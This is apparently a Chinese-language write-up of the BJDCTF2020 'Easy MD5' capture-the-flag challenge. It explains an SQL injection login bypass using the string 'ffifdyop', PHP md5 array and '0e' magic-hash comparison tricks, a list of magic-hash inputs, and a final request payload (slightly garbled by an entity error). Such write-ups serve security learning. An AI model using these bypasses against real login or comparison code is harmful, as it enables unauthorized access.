[BJDCTF2020]Easy MD5 1
文章目录
-
- [BJDCTF2020]Easy MD5 1
-
-
- 知识点一sql注入绕过md5
- 知识点二md5绕比较
-
[BJDCTF2020]Easy MD5 1
知识点一sql注入绕过md5
![[BJDCTF2020]Easy MD5 1_第1张图片](http://img.e-com-net.com/image/info8/fa669088b36e405daf4c0ed3e148b2f2.jpg)
select * from ‘admin’ where password=md5($pass,true)
源码中的提示,绕过md5,ffifdyop这个进行md5加密后变成276f722736c95d99e921722cf9ed621c
这个前几位经过mysql转换成十进制后对应的ASCII码内容为刚好是’ or '正好闭合,又因为or是万能密码头,即可以绕过
知识点二md5绕比较
<!-- $a = $GET['a']; $b = $_GET['b'];
if($a != $b && md5($a) == md5($b)){
// wow, glzjin wants a girl friend.
-->
1.利用数组绕过
a[]=1&b[]=1,由于 md5 函数哈希数组会返回 NULL,故只需传入不同的数组即可
error_reporting(0);
include "flag.php";
highlight_file(__FILE__);
if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
echo $flag;
}
2.利用0e科学计数法加科学计数法即可绕过即可
QNKCDZO
0e830400451993494058024219903391
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
payload:param1[]=0e509367213418206700842008763514¶m2[]=0e848240448830537924465865611904
即可得到flag
md5绕过学习